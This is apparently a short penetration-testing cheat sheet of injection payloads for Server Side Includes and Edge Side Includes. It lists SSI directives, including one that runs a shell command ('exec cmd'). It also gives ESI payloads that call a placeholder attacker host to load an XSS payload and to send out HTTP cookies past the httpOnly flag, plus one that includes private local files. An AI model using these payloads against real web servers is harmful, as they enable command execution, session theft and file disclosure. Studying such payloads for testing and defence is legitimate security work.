Server Includes
Server/Edge Side Includes
Server Side Includes
// Date
<!--#echo var="DATE_LOCAL" -->
// Modification date of a file
<!--#flastmod file="index.html" -->
// CGI Program results
<!--#include virtual="/cgi-bin/counter.pl" -->
// Including a footer
<!--#include virtual="/footer.html" -->
// Executing commands
<!--#exec cmd="ls" -->
// Setting variables
<!--#set var="name" value="Rich" -->
// Including virtual files (same directory)
<!--#include virtual="file_to_include.html" -->
// Including files (same directory)
<!--#include file="file_to_include.html" -->
// Print all variables
<!--#printenv -->Edge Side Includes
// Basic detection
<esi: include src=http://<PENTESTER IP>>
// XSS Exploitation Example
<esi: include src=http://<PENTESTER IP>/<XSSPAYLOAD.html>>
// Cookie Stealer (bypass httpOnly flag)
<esi: include src=http://<PENTESTER IP>/?cookie_stealer.php?=$(HTTP_COOKIE)>
// Introduce private local files (Not LFI per se)
<esi:include src="supersecret.txt">Last updated